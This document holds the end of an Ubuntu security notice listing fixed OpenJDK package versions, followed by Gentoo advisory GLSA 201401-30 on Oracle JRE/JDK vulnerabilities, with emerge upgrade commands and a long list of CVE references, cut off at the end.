A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. (CVE-2013-1481)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2
Ubuntu 11.10:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2
This update uses a new upstream release which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
5 affected packages
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below for
details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
